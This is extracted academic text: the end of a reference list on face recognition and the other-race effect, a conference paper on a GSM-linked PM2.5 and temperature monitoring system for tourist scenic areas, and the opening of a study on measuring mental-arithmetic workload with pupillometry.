other more complicated explanations. references abdi, h. ( ). a generalized approach for connectionist auto-associative memories: interpre- tation, implications and illustration for face pro- cessing. in j. demongeot (ed.) artificial in- telligence and cognitive sciences. manchester: manchester university press. anderson, j. a., silverstein, j. w., ritz, s. a. & jones, r. s. ( ). distinctive features, cate- gorical perception and probability learning: some o’toole, deffenbacher, abdi, & bartlett figure . the first eigenvector of a caucasian and japanese majority matrix made from a pixel-based code without spatial differentiation. applications of a neural model. psychological re- view, , – . bothwell, r. k., brigham, j. c. & malpass, r. s. ( ). cross-racial identification. personality and social psychology bulletin, , – . brigham, j. c. ( ) the influence of race on face recognition. in h. d. ellis, m. a. jeeves, f. newcombe & a. young (eds) aspects of face processing. dordrecht: martinus nijhoff. brigham, j. c. 
& barkowitz, p. ( ). do “they all look alike?” the effect of race, sex, ex- perience, and attitudes on the ability to recognize faces. journal of applied social psychology, , – . brigham,j. c., malpass, a., snyder, l. s. & spaulding, k. ( ). the accuracy of eyewitness identification in a field setting. journal of person- ality and social psychology, , – . chance, j. e., turner, a. l. & goldstein, a. g. ( ). development of differential recognition of own-and other-race faces. journal of psychology, , – . cross, j. g., cross, j. & daly, j. ( ). sex, race, age and beauty as factors in recognition of faces. perception & psychophysics, , – . deffenbacher, k. a. & loftus, e. f. ( ). do jurors share a common understanding concerning eyewitness behavior? law and human behavior, , – . feingold, c. a. ( ). the influence of envi- ronment on identification of persons and things. journal of criminal law and police science, , – . feinman, s. & entwistle, d. r. ( ). chil- dren’s ability to recognize other children’s faces. child development, , – . simulating the other-race effect goldstein, a. g. & chance, j. e. ( ). effects of training on japanese face recognition: reduc- tion of the other-race effect. bulletin of the psy- chonomic society, , – . hopfield, j. j. ( ). neurons with graded re- sponses have collective computational properties like those of two-state neurons. proceedings of the national academy of sciences, , – . kohonen, t. ( ). self organization and as- sociative memory. berlin: springer verlag. malpass, r. s. ( ) training in face recog- nition. in g. davies, h. ellis & j. shepherd (eds) perceiving and remembering faces. lon- don: academic press, pp. - . o’toole, a. j. & abdi, h. ( ). connection- ists approaches to visually based feature extrac- tion. in g. tiberghien (ed.) advances in cognitive psychology, vol. . london: wiley. o’toole, a. j., millward, r. b. & anderson, j. a. ( ). a physical system approach to recogni- tion memory for spatially transformed faces. neu- ral networks, , – . shapiro, p. n. & penod, s. d. ( ). meta- analysis of face identification studies. psychologi- cal bulletin, , – . sirovitch, l. &. kirby, m. ( ). low- dimensional procedure for the characterization of human faces. journal of the optical society of america, , – . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the monitoring and wireless transmission system of pm . in the scenic wang xiaohui school of leisure management xi’an eurasia university xi’an, china e-mail: wangxiaohui@eurasia.edu lei kewei school of leisure management xi’an eurasia university xi’an, china e-mail: leikewei@eurasia.edu abstract—this scenic area has large traffic volume and complex environment and some scenic areas need to be protected. so developing an air quality monitoring system is very important. in this paper, the temperature sensor, the pm . sensor and the wireless transmission module were combined by the mcu. it monitors the spot in pm . concentration and the temperature information. when the pm . concentration is higher than the threshold, the wireless transmission module sends the warning signal. so the system could measure and improve the environment of scenic spot. keywords-pm . sensor; dust monitoring; temperature sensor; sim a i. introduction with the rapid development of the industrial level, the air quality in daily life is getting worse. especially when the people are densely poured into the scenic area, the ambient air quality is even worse[ ]. 
therefore, how to effectively collect the pm . in the scenic core area and transmit data in time is a difficult problem to be solved[ ]. in recent years, the minimum system is used in the dust monitoring with the advantages of small size, powerful function and the low cost[ ]. so the application of the pm . sensor and the wireless transmission system based on c board can ensure the physical and mental safety in the scenic area for the tourists. ii. analysis of the system architecture a. system hardware architecture the system based on c single chip is composed of the data acquisition module, the key circuit, the alarm module and the gsm wireless transmission module. the structure of the system is shown in figure . as shown in figure , the system can collect the pm . and the temperature data in a certain area through the dust particle sensor and the temperature sensor. because the analog signal could not processed by the mcu, so using ds ad conversion module to convert the analog signal to the digital signal and then transmit the data to the mcu and displayed on the lcd screen. at the same time, the mcu compares the collected data with the threshold, if the collected value is higher than the threshold, the buzzer will alarm and send the pm . concentration and the current temperature information to the user with the short message[ ]. stc c ( mcu) dust particle sensor a/ d conversion ( ad ) gsm sms sending module mobile phone lcd c ircuit b temperature sensor key c ircuit alarm module ( buzzer) digital signal analog signal analog signal collection of information alarm instruction figure . system structure diagram b. pm . dust sensor module the selection of the pm . dust sensor affects the range and precision of the monitoring module directly. gp y au f dust concentration sensor was used in this paper. from table , the working voltage of the dust concentration sensor module is the same with the single chip. its high accuracy meets the requirements of the majority of users. the large temperature range can be applied to all kinds of bad environment. in general, more than mg/m of pm . can cause harm to the human body, so this module's range is sufficient. table . characteristics of dust concentration sensor characteristic input voltage (v) current(ma) precision(µm) index . ~ . < . characteristic working temperature(℃) range(mg/m ) sensitivity index - ~+ ~ . . v/ . mg dust sensor is used to measure the dust concentration in the air by the reflection principle of dust. the internal structure of the dust concentration sensor is shown in figure . international conference on sensor network and computer engineering (icsnce ) amplifier circuit case pd v-led rsdust or smoke particle dust through .hole led-gnd s-gnd vo vcc led ired figure . the structure of the dust concentration sensor table . dust sensor pin pin description v gnd pulse gnd output voltage v function control the receiving pd control the sending ired the function and pin of the dust sensor is shown in table . with the received pulse signal and the output voltage signal from the single chip, the dust sensor controls the receiving device pd (photo detector). the sending device ired (infrared light emitting diode) feeds the mcu with the dust concentration in the form of voltage. there are two transistors ired and pd inside the dust sensor. the ired emits the light and the pd receives the light signals reflected back by the dust. when the module works normally, the ired emits the light. 
if the dust particle density is high enough, the reflected light will be received by the pd, and the intensity of the light signal will change the voltage across the pd. thus, the higher the output voltage, the higher the pm2.5 concentration.

c. ds temperature sensor module

a ds digital thermometer provides nine-bit (binary) temperature readings, and the single chip can communicate with the ds . each ds has a specific sequence number, so multiple ds devices can work on the same bus without contention. the pin connections of the ds are shown in figure .

figure . the pin connections of the ds .

the measurement range of the ds is from - ℃ to ℃, and two eight-bit temperature values are stored. the ds has two power supply modes: the data-bus power supply mode and the external power supply mode. the first mode uses fewer wires but is less efficient; the latter uses a single wire but is faster. the ds interface specifications are: pin one is ground; pin two connects to the single-chip pin p for data transmission; pin three connects to vcc. the ds stores the temperature as a nine-bit value in which the highest bit is the sign bit. the temperature storage format of the ds is shown in table . when the temperature is negative, s = ; when it is positive, s = . for example, aah indicates + ℃, h is ℃, and ff h is - ℃.

table . ds temperature storage. the ls byte holds the temperature magnitude, with each bit weighted by a power of two; every bit of the ms byte holds the sign bit s.

d. gsm wireless communication module

gsm (global system for mobile communications) is the second generation of mobile communication technology. it promotes globalization and allows users to communicate around the world with a single mobile phone, based on a unified standard for the mobile phone network, namely the gsm. the gsm wireless communication module adopts simcom's sim a module to realize the short message function. the sim a module supports most g or g mobile communication services, and the ttl serial port and the rs module can be used for debugging. the sim a module has a power self-start function. first, the sim card is placed in the slot; the working mode of the sim a is then indicated by its status leds, as shown in table .

table . the working mode of the sim a.
led indication | working status
long bright, quick flashing | searching net
long bright, slow flashing | normal working
over lighting long and off short | low power
off, slow flashing | send
ring off one time and long bright, slow flashing | receive one message

the gsm module realizes the sms function through the sim a chip controlling the sim card module and the other modules. nowadays it is widely used in china.

e. design the system software

at first, the system initializes the flash, the ports, and the lcd, etc.[ ]. then the sensor begins to work and the data collection is achieved. after the a/d conversion, the data are displayed on the lcd . at this point, if the data are higher than the threshold, the buzzer alarms and the data are sent to the user's mobile phone through the gsm wireless transmission module to complete the alarm function[ ]. the software process is shown in figure .
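the main-loop logic just described (sampling, conversion, threshold comparison, alarm/sms) can be sketched in a few lines. the sketch below is illustrative python rather than the actual mcu firmware, which would be written in c for the single chip; the adc resolution, reference voltage, and sensitivity constant are assumptions for the example and are not taken from the paper.

```python
import statistics

# assumed constants; the real firmware values are not given in this excerpt
ADC_FULL_SCALE = 255          # assuming an 8-bit a/d converter
VREF = 5.0                    # assumed reference voltage (v)
SENSITIVITY_V_PER_MG = 5.0    # assumed sensor slope, v per (mg/m^3)

def adc_to_voltage(raw):
    # convert a raw adc count to the sensor output voltage
    return raw * VREF / ADC_FULL_SCALE

def pm25_concentration(raw_samples):
    # median-filter the raw samples, then map the voltage to a dust concentration (mg/m^3)
    voltage = adc_to_voltage(statistics.median(raw_samples))
    return voltage / SENSITIVITY_V_PER_MG

def monitor_step(raw_samples, temperature_c, threshold_mg_m3, send_sms):
    # one pass of the main loop: display, compare with the threshold, alarm if exceeded
    pm25 = pm25_concentration(raw_samples)
    print(f"temp: {temperature_c:.1f} C  pm2.5: {pm25:.3f} mg/m^3")   # stands in for the lcd
    if pm25 > threshold_mg_m3:
        send_sms(f"pm2.5 alarm! t: {temperature_c:.1f} C  p: {pm25:.3f} mg/m^3")
    return pm25

# example: ten raw adc readings, with `print` standing in for the gsm/sms module
monitor_step([30, 32, 31, 29, 250, 30, 33, 31, 30, 32], 23.5, 0.05, send_sms=print)
```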
figure . the flow chart of the system: after initialization and a/d conversion, the measured pm2.5 and temperature are displayed; if the data exceed the threshold, an alarm or message is sent, and the threshold can be modified with the key circuit.

iii. acquisition and transmission

a. data collection of the pm2.5

the data collection of the dust concentration is the key part of the software programming. the data collection and processing of the pm2.5 concentration are introduced in figure .

figure . pm2.5 collection flow chart: after initialization the led is switched on, the analog signal is collected a number of times, converted to a digital signal, median filtered, and converted to a voltage value, from which the pm2.5 concentration is calculated and displayed.

when the power turns on, the dust monitoring sensor initializes[ ]. the pm2.5 sensor then waits for the instruction from the mcu. when it receives the instruction, the sensor turns on the ired for data acquisition, the pd (photo detector) receives the reflected light signal, and the light intensity affects the voltage across the pd, which is sent to the mcu[ ]. after receiving the voltage signal, the mcu controls the a/d converter to begin conversion, and the collected information is sent to the lcd, so the data acquisition is completed.

b. the temperature data collection

the ds temperature sensor collects the temperature and returns the digital information[ ]. as shown in figure , after initialization, the sensor reads the data in rom: the serial number and the temperature information of the ds [ ]. after the general delay of s, the temperature information can be read, and the pointer in the buffer is then incremented for the next data reading[ ].

figure . the flow chart of temperature collection: initialization, reading the rom, a delay, reading the memory, data processing, and incrementing the buffer pointer.

iv. system test results

the system platform is placed in the core area of the scenic area, and the sensor is opened to collect and transmit the surrounding environment parameters in real time[ ]. the data collection is divided into two parts: the dust concentration acquisition and the temperature acquisition. as shown in figure (a), the lcd displays the temperature and pm2.5 concentration while the system is monitoring. at this time the temperature is . ℃, and the concentration of pm2.5 is . mg/m . the concentration threshold of the pm2.5 can be set by the key circuit, and the pm2.5 concentration threshold is set to . mg/m .

figure . data collection and concentration setting diagram: (a) the measured temperature and pm2.5 concentration on the lcd; (b) the pm2.5 alarm threshold setting.

when the concentration of pm2.5 exceeds the threshold, the display information on the lcd screen is shown in figure (a). at present, the concentration of pm2.5 is . mg/m , which exceeds the threshold of . mg/m , so the gsm wireless transmission module sends the alarm information to the user, as shown in figure (b). at this time, the user sees the pm2.5 concentration alarm. the temperature is . ℃, and the concentration of pm2.5 is . mg/m , which is the same as the alarm information on the lcd screen.

figure . system alarm and sms: (a) the alarm shown on the lcd; (b) the sms received on the user's mobile phone.

through the monitoring system, the user can see the surrounding environmental parameters of the monitored area in time, so the problem of environmental monitoring in the scenic core area can be solved through the platform.

v. conclusions

the monitoring system for the pm2.5 concentration and the real-time temperature is designed in this paper.
the collected data was transmitted by the wireless transmission module based on the mcu. when the pm . concentration is higher than a threshold, the buzzer alarms and the current environment information is sent to the mobile phone. because the low cost and the highly performance characteristic, so it can be applied to the high-density areas. acknowledgment this work was partly supported by shaanxi province social science fund project (no. r ) of china and by the scientific research fund project of shaanxi provincial department of education ( jk ). references [ ] g.xu, x.yang, and q.yang, et al. “design on magnetic coupling r esonance wireless energy transmission and monitoring system for i mplanted devices”, ieee transactions on applied superconductivity, vol. , apr. , pp. - , doi: . /tasc. . j. [ ] r.prakash, a.b.ganesh, and s. v.girish. “cooperative wireless netw ork control based health and activity monitoring system”, journal of medical systems, vol. , oct. , pp. , doi:: . /s - - - . [ ] j. c.heo, b.kim, and y. n.kim, et al. “induction of inflammation in vivo by electrocardiogram sensor operation using wireless power transmission”, sensors, vol. , dec. , pp. , doi: . /s . [ ] t.liang, y.j.yuan. “wearable medical monitoring systems based on wireless networks: a review”, ieee sensors journal, vol. , aug. , pp. - , doi: . /jsen. . . [ ] q.zheng, h.zhang, and b.shi, et al. “in vivo self-powered wireless cardiac monitoring via implantable triboelectric nanogenerator”, ac s nano, vol. , jul. , pp. , doi: . /acsnano. b . [ ] g.anfuso, a.t.williams, and g.c.martínez. “evaluation of the scenic value of beaches in cuba: implications for coastal tourism management”, ocean & coastal management, vol. , may. , pp. - , doi: . /j.ocecoaman. . . . [ ] s.shi, z.wu, and f.liu, et al. “retention of atmospheric particles by local plant leaves in the mount wutai scenic area, china”, atmosphere, vol. , aug. , pp. , doi: . /atmos . [ ] p.chen, y.q.lian. “modeling of soil loss and its impact factors in the guijiang karst river basin in southern china”, environmental earth sciences, vol. , apr. , pp. , doi: . /s - - -z. [ ] j.guo, f.xia, and y.zhang. “impact of diurnal variability and meteorological factors on the pm . -aod relationship: implications for pm . remote sensing”, environmental pollution, vol. , nov. , pp. , doi: . /j.envpol. . . . [ ] s.samiksha, r.r.sunder, and nirmalkar j. “pm and pm . chemical source profiles with optical attenuation and health risk indicators of paved and unpaved road dust in bhopal, india”, environmental pollution, vol. , nov. , pp. - . doi.org/ . /j.envpol. . . . [ ] s.k.r.boreddy, t.mochizuki, and kawamura k, et al. “homologous series of low molecular weight (c -c ) monocarboxylic acids, benzoic acid and hydroxyacids in fine-mode (pm . ) aerosols over the bay of bengal: influence of heterogeneity in air masses and formation pathways”, atmospheric environment, vol. , oct. , pp. - , doi: . /j.atmosenv. . . . [ ] h.m.lee, r.j.park, and henze d k, et al. “pm . source attribution for seoul in may from to using geos-chem and its adjoint model”, environmental pollution, vol. , nov. , pp. .- , doi: . /j.envpol. . . . https://doi.org/ . /tasc. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /s https://doi.org/ . /jsen. . https://doi.org/ . /j.envpol. . . 
workload assessment for mental arithmetic tasks using the task-evoked pupillary response submitted may accepted july published august corresponding author joost de winter, j.c.f.dewinter@tudelft.nl academic editor helen petrie additional information and declarations can be found on page doi . /peerj-cs. copyright marquart and de winter distributed under creative commons cc-by . open access workload assessment for mental arithmetic tasks using the task-evoked pupillary response gerhard marquart and joost de winter department of biomechanical engineering, faculty of mechanical, maritime and materials engineering, delft university of technology, delft, the netherlands abstract pupillometry is a promising method for assessing mental workload and could be helpful in the optimization of systems that involve human–computer interaction. the present study focuses on replicating the studies by ahern ( ) and klingner ( ), which found that for three levels of difficulty of mental multiplications, the more difficult multiplications yielded larger dilations of the pupil. using a remote eye tracker, our research expands upon these two previous studies by statistically testing for each . s interval of the calculation period ( ) the mean absolute pupil diameter (mpd), ( ) the mean pupil diameter change (mpdc) with respect to the pupil diameter during the pre-stimulus accommodation period, and ( ) the mean pupil diameter change rate (mpdcr). an additional novelty of our research is that we compared the pupil diameter measures with a self-report measure of workload, the nasa task load index (nasa-tlx), and with the mean blink rate (mbr). the results showed that the findings of ahern and klingner were replicated, and that the mpd and mpdc discriminated just as well between the lowest and highest difficulty levels as did the nasa-tlx. the mbr, on the other hand, did not differentiate between the difficulty levels. moderate to strong correlations were found between the mpdc and the proportion of incorrect responses, indicating that the mpdc was higher for participants with a poorer performance. for practical applications, validity could be improved by combining pupillometry with other physiological techniques. subjects human–computer interaction keywords pupillometry, human factors, pupil diameter, cognitive load introduction mental workload is an important psychological construct that is challenging to assess on a continuous basis. a commonly used definition of mental workload is the one proposed by hart & staveland ( ). these authors defined workload as “the cost incurred by a human operator to achieve a particular level of performance.” (p. ). a valid and reliable assessment method of workload could be helpful in the optimization of systems that involve human–computer interaction, such as vehicles, computers, and simulators. one promising method for measuring workload is pupillometry, which is the measurement of the pupil diameter (e.g., goldinger & papesh, ; granholm & steinhauer, ; klingner, kumar & hanrahan, ; laeng, sirois & gredebäck, ; marshall, ; palinko et al., ; schwalm, keinath & zimmer, ). how to cite this article marquart and de winter ( ), workload assessment for mental arithmetic tasks using the task-evoked pupillary response. peerj comput. sci. :e ; doi . /peerj-cs. mailto:j.c.f.dewinter@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . 
/ http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. two antagonistic muscles regulate the pupil size: the sphincter and the dilator muscle. activation of these muscles results in the contraction and dilation of the pupil, respectively. during a mentally demanding task, the pupils have been found to dilate up to . mm, which is small compared to the maximum dilation of about mm caused by changes in lighting conditions (e.g., beatty & lucero-wagoner, ). the involuntary reaction of the pupil to changes in task conditions is also called the task-evoked pupillary response (tepr; beatty, ). in the past, teprs were obtained at – hz by motion picture photography (hess & polt, ). this required researchers to measure the pupil diameter manually frame by frame (janisse, ). nowadays, remote non-obtrusive eye trackers are increasingly being used to automatically measure teprs, as these devices are getting more and more accurate. over the years, researchers have encountered a few challenges in pupillometry. reflexes of the pupil to changes in luminance, for example, may undermine the validity of teprs. one way to improve validity is to strictly control the luminance of the experimental stimuli, but this limits the usability of pupillometry. marshall ( ) reported she found a way to filter out the pupil light reflex using wavelet transform techniques. she patented this method and dubbed it the “index of cognitive activity”. the influence of gaze direction on the measured pupil size is another issue. where pomplun & sunkara ( ) reported a systematic dependence of pupil size on gaze direction, klingner, kumar & hanrahan ( ) argued that the ellipse-fitting method for the estimation of the pupil size is not affected by perspective distortion. in the last few decades many researchers have investigated the pupillary response for different types of tasks. typically, the dilation was found to be higher for more challenging tasks (ahern, ; kahneman & beatty, ), including mental arithmetic tasks (boersma et al., ; bradshaw, ; hess & polt, ; schaefer et al., ). not only task demands have been found to influence the pupil diameter, but also factors like anxiety, stress, and fatigue. tryon ( ) and janisse ( ) extensively reviewed known sources of variation in pupil size. back then, janisse ( ) commented on the underexplored area of whether pupillary dilations reliably reflect individual differences in intelligence. ahern ( ) discovered that persons scoring higher on intelligence tests showed smaller pupillary dilations on tasks of fixed difficulty. in a more recent study, van der meer et al. ( ) found greater pupil dilations for individuals with high intelligence than with low intelligence during the execution of geometric analogy tasks. thus, the results are not consistent and demand further investigation. the present study focuses on replicating the pupil diameter study by ahern ( ) for mental multiplications of varying levels of difficulty. ahern ( ) found that the more difficult multiplications yielded a greater mean pupil diameter. in her research, ahern ( ) used a so-called television pupillometer (whittaker s) that was able to measure the pupil diameter in real-time. specifically, the device processed images obtained from an infrared video camera, identified the pupil diameter using a pattern-recognition algorithm, and computed the diameter of the image of the pupil (beatty & wilson, ). 
participants used a chin-rest and infrared eye illuminator, and the camera was positioned marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. approximately cm from the participant’s left eye. our study is also intended as a follow-up study of klingner ( ). klingner ( ) recently replicated ahern’s ( ) results with a remote eye tracker (tobii ) having a similar working principle as the eye tracker used by ahern ( ). in klingner ( ), the participants sat approximately cm from the screen and infrared cameras, and they did not use a chin-rest or head-mounted equipment. in his analyses, klingner ( ) used the average of the two eyes’ pupil diameters. with a large number of participants ( in our study, in ahern, , and in klingner, ) and trials ( , , , , and , respectively), and a higher measurement frequency ( hz, hz, and hz, respectively), the present study aimed to obtain the teprs for three levels of difficulty of mental multiplications. we report the mean pupil diameter change (mpdc) with respect to the baseline pupil diameter right before the presentation of the multiplicand, as was also done by ahern ( ) and klingner ( ). in addition, we report the absolute mean pupil diameter (mpd). laeng, sirois & gredebäck ( ) explained that pupil diameter responses exhibit both a phasic component (i.e., ‘rapid’ responses to task-relevant events) as well as a tonic component (i.e., ‘slow’ changes in the baseline pupil diameter). the mpdc allowed us to assess the tepr, while the mpd allowed us to determine whether the baseline itself differed as a function of the difficulty of the multiplications. furthermore, in our study, the mean pupil diameter change rate (mpdcr), a measure introduced by palinko et al. ( ), was examined. the mpdcr is the discrete-time equivalent to the first derivative of the pupil diameter and may be useful for assessing moment-to-moment changes in mental workload. while ahern ( ) and klingner ( ) statistically compared the maximum dilation and mean dilation between the difficulty levels of the mental multiplications, we applied a more fine-grained approach where the mpdc, mpd, and mpdcr were subjected to a statistical test for each . s time interval in the calculation period. another way in which our research differs from the works of ahern ( ) and klingner ( ) is that we included two additional measures of mental workload. first, we compared the effect sizes of the pupil diameter measures with those obtained with a classic subjective measurement method of workload, the nasa-tlx. second, we assessed the mean blink rate (mbr). the relation between mental workload and blink rate has been unclear (kramer, ; recarte et al., ; marquart, cabrall & de winter, ), and our aim was to clarify this relationship. the numbers in our study were presented visually in order to gain temporal consistency, as was also done by klingner ( ; cf. ahern, , in which the numbers were presented aurally). furthermore, as in klingner ( ), the pupil diameter was recorded with an automatic remote eye tracker (smarteye dr ). method ethics statement the research was approved by the human research ethics committee (hrec) of the delft university of technology (tu delft ‘workload assessment for mental arithmetic tasks marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure experimental equipment: monitor with built-in eye tracker (smarteye dr ), chin-rest, and keyboard. using the task-evoked pupillary response: january , ). all participants provided written informed consent. participants thirty participants ( women and men), aged between and years (m = , sd = . years) were recruited to volunteer in this experiment ( bsc/msc students and persons with an msc degree). individuals wearing glasses or lenses were excluded from participation. all participants read and signed an informed consent form, explaining the purpose and procedures of the experiment and received e compensation for their time. equipment the smarteye dr remote eye tracker, with a sampling rate of hz, was used to record the participant’s pupil diameter, eyelid opening, and gaze direction while sitting behind a desktop computer (see fig. ). the pupil diameter was the average of the left and right pupil diameter, as provided by the smarteye . software. the software estimates the pupil diameter as the major axis of an ellipse that is fit to the edge of the pupil. in order to obtain more accurate measurements, a chin-rest was used. the eye tracker was equipped with a -inch screen, which was positioned approximately cm in front of the sitting participant and which was used to display task-relevant information. the outcome of a task had to be entered using the numeric keypad of a keyboard (cf. ahern, in which participants used a keyboard, and klingner, in which participants used a touchscreen). the experiment took place in a room where there was office lighting delivered by standard fluorescent lamps and where daylight could not enter. our approach to room illumination was similar to that used by klingner ( ). we acknowledge that a stricter marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure task display during accommodation, pause, and calculation period. control of lighting is possible. for example, janisse ( ) reported that he ensured constant illumination of his experimental lab by feeding all electric current used in the room through a constant voltage transformer. no such strict control of illumination was applied in our research nor did we measure the degree of ambient lighting. however, because the experimental conditions were counterbalanced, we reasoned that there could be no systematic effect of ambient lighting on our results. furthermore, we used a screen background with variable brightness, designed to minimize the pupillary light reflex in case a participant looked away from the center of the screen (fig. ; marquart, ). the corresponding image file is available in supplemental information. procedure the participants were requested to perform trials of mental arithmetic tasks (multipli- cations of two numbers), five of which were used as a short training. the remaining trials were presented in three sessions of different levels of difficulty (easy, medium, and hard; see table s ). level contained the easiest multiplications (outcomes ranging between and ), level contained multiplications of intermediate difficulty (outcomes between and ), and level contained the hardest multiplications (outcomes between and ). the sequence of the three sessions was counterbalanced across the participants. 
Each trial was initiated by the participant by pressing the Enter key and started with a s accommodation period, followed by a s visual presentation of two numbers (multiplicand and multiplier) between and , with a . s pause in between (Table ). The participants were asked to multiply the two numbers and type their answer on the numeric keypad s after the multiplier disappeared. Thus, the total duration of one trial was . s ( + + . + + ). When the numbers were not presented, a double "x" was shown to avoid pupillary reflexes caused by changes in brightness or contrast.

Table : Timeline of an individual trial, listing the start time (s), end time (s), and on-screen symbol per period. The periods are: accommodation (xx), baseline (xx), multiplicand, pause (xx), multiplier, calculation (xx), and response (until the Enter key is pressed; no symbol).

After each of the three sessions, participants were asked to fill out a NASA-TLX questionnaire to assess their subjective workload on six facets: mental demand, physical demand, temporal demand, performance, effort, and frustration (Hart & Staveland, ). All questions were answered on a scale from % (very low) to % (very high). For the performance question, % meant perfect and % meant failure. The participants' overall subjective workload was obtained by averaging the scores across the six items. The total duration of the experiment was approximately min.

Instructions to participants
Before the experiment started, the participants were informed that they had to do multiplications, five of which would be used as a short training. They were also told that the remaining trials would be presented in three sessions of varying difficulty (easy, medium, and hard). The participants were requested to position themselves in front of the monitor with their chin leaning on the chin-rest. They were instructed to stay still, keep their gaze fixed, and focus (not stare) at the center of the screen throughout a trial. In addition, participants were asked to blink as little as possible, obviously without causing irritation, and to start each trial with 'a clear mind' (i.e., not thinking about the previous trial). If the participants could not complete the multiplication, they were instructed to enter zero as their answer.

Data processing
The data were processed in two steps, sketched in code below. In the first step, the missing values in the pupil diameter data (lost during recording) were removed and the signals were repaired with linear interpolation (see Fig. A for an illustration). On average, . % of the data were lost, so this processing step did not substantially influence the results. In the second step, blinks and poor-quality data were removed. During a blink, the eyelid opening rapidly diminishes and then increases within a few tenths of a second until it is fully open again. It is impossible to track the pupil diameter while blinking. The pupil diameter quality signal (provided by the SmartEye software) was used to filter out the poor-quality data. This signal ranges from to , with values close to indicating good quality (SmartEye, ). All data points with a pupil diameter quality below . were removed. Trials containing less than % of the data were excluded from the analysis.
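The following is a minimal sketch of this two-step cleaning for a single trial, assuming the pupil trace, quality signal, and time vector are available as arrays. The quality cut-off and the minimum fraction of valid data are placeholder constants standing in for the values that do not survive in this copy of the text; they are not the authors' exact thresholds.

```python
import numpy as np

QUALITY_CUTOFF = 0.5       # assumed stand-in for "quality below ..."
MIN_VALID_FRACTION = 0.5   # assumed stand-in for "less than ...% of the data"

def clean_trial(pd, quality, t):
    """pd, quality, t: equally long 1-D arrays (diameter in mm, quality 0..1,
    time in s). Returns the cleaned trace, or None if the trial is excluded."""
    pd = pd.astype(float).copy()

    # Step 1: repair samples lost during recording (NaNs) with linear
    # interpolation over time.
    missing = np.isnan(pd)
    pd[missing] = np.interp(t[missing], t[~missing], pd[~missing])

    # Step 2: drop blinks / poor-quality samples and interpolate the gaps.
    bad = quality < QUALITY_CUTOFF
    if (~bad).mean() < MIN_VALID_FRACTION:
        return None  # trial excluded from the analysis
    pd[bad] = np.interp(t[bad], t[~bad], pd[~bad])
    return pd
```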
Of the initial , trials from participants, , trials passed these criteria ( for level , for level , and for level ; the entire level session of one participant [ trials] was discarded). The gaps in the , trials were filled using linear interpolation (Fig. B).

Figure : Illustration of data processing. (A) Pupil diameter (PD) before and after linear interpolation for missing values. (B) Pupil diameter before and after linear interpolation for poor-quality data.

The last . s of the accommodation period was defined as the pupillary baseline, as was done by Klingner ( ). The mean pupil diameter of the baseline period ( . – . s) of each trial was subtracted from that trial to accommodate for any possible shifts or drifts. The mean pupil diameter change (MPDC) for each participant was then obtained by averaging all trials per level of difficulty. Similarly, the mean pupil diameter (MPD) for each participant was obtained, but without subtracting the mean pupil diameter of the baseline period. The MPDCR was calculated for each participant as the average velocity (mm/s), that is, the change in MPD between two points in time. In order to compare the three difficulty levels, the MPD and MPDC were analyzed at eight fixed points in time in the multiplier and calculation periods (i.e., P = . s, P = . s, P = . s, P = . s, P = . s, P = . s, P = . s, P = . s). The MPDCR was assessed across the seven interim periods.

In addition to these analyses, the mean blink rate (MBR) was calculated for two different periods in time. That is, a distinction was made between low mental demands (i.e., from the beginning of the accommodation period until the presentation of the multiplier, from to . s) and high mental demands (i.e., from the presentation of the multiplier until the end of the calculation period, from . to . s). A blink was defined as the moment that the eye opening dropped below % of the mean eyelid opening of that trial (see Fig. S ); a sketch of this rule is given below.
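The following is an illustrative implementation of the blink-detection rule and the mean blink rate (MBR) for one trial. The blink fraction is a placeholder for the stripped percentage, and the period boundaries are passed in as arguments; none of these constants are taken from the paper.

```python
import numpy as np

BLINK_FRACTION = 0.5  # assumed stand-in for "below ...% of the mean eyelid opening"

def blink_count(eyelid_opening):
    """Count blinks as downward crossings of the blink threshold."""
    threshold = BLINK_FRACTION * np.mean(eyelid_opening)
    closed = eyelid_opening < threshold
    # A blink is counted at each transition from open to closed.
    onsets = np.flatnonzero(~closed[:-1] & closed[1:])
    return len(onsets)

def mean_blink_rate(eyelid_opening, t, period):
    """Blinks per second within the (start_s, end_s) period of one trial."""
    start, end = period
    mask = (t >= start) & (t < end)
    return blink_count(eyelid_opening[mask]) / (end - start)
```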
Statistical analyses
The pupil diameter measures (MPD, MPDC, and MPDCR), the blink rates (MBR), and the results of the NASA-TLX were analyzed with paired t-tests between the three levels (i.e., level vs. , level vs. , and level vs. ). Additionally, Pearson's r correlation coefficients were obtained between the MPDC, the NASA-TLX, and the percentage of incorrect responses. For all analyses, a Bonferroni correction was applied. Accordingly, we set the significance level to . / (∼ . ). Cohen's dz effect size (see Eq. ( )) was calculated to determine at which points in time the differences in MPDC between the three levels of difficulty were largest. In Eq. ( ), M and SD are the mean and standard deviation of the vectors of data points, respectively, r is the Pearson correlation coefficient between the two vectors of data points, t is the t-statistic of a paired t-test, and n is the sample size (i.e., the number of pairs, which was either or ).

$$
d_z \;=\; \frac{M_i - M_j}{\sqrt{SD_i^{2} + SD_j^{2} - 2\,r\,SD_i\,SD_j}} \;=\; \frac{t}{\sqrt{n}} \qquad ( )
$$
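A minimal sketch of one such pairwise comparison is given below: a paired t-test between two difficulty levels at one time point, a Bonferroni-corrected significance threshold, and Cohen's dz obtained from the t-statistic as in the equation above. The alpha level and the number of comparisons are arguments rather than the paper's exact values.

```python
import numpy as np
from scipy import stats

def compare_levels(mpdc_level_a, mpdc_level_b, n_comparisons, alpha=0.05):
    """Paired comparison of per-participant MPDC values (mm) for two levels.

    Returns the t-statistic, the p-value, Cohen's dz, and whether the
    difference is significant under a Bonferroni-corrected threshold.
    """
    t, p = stats.ttest_rel(mpdc_level_a, mpdc_level_b)
    n = len(mpdc_level_a)
    dz = t / np.sqrt(n)                       # Cohen's dz for paired samples
    significant = p < alpha / n_comparisons   # Bonferroni-corrected threshold
    return t, p, dz, significant
```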
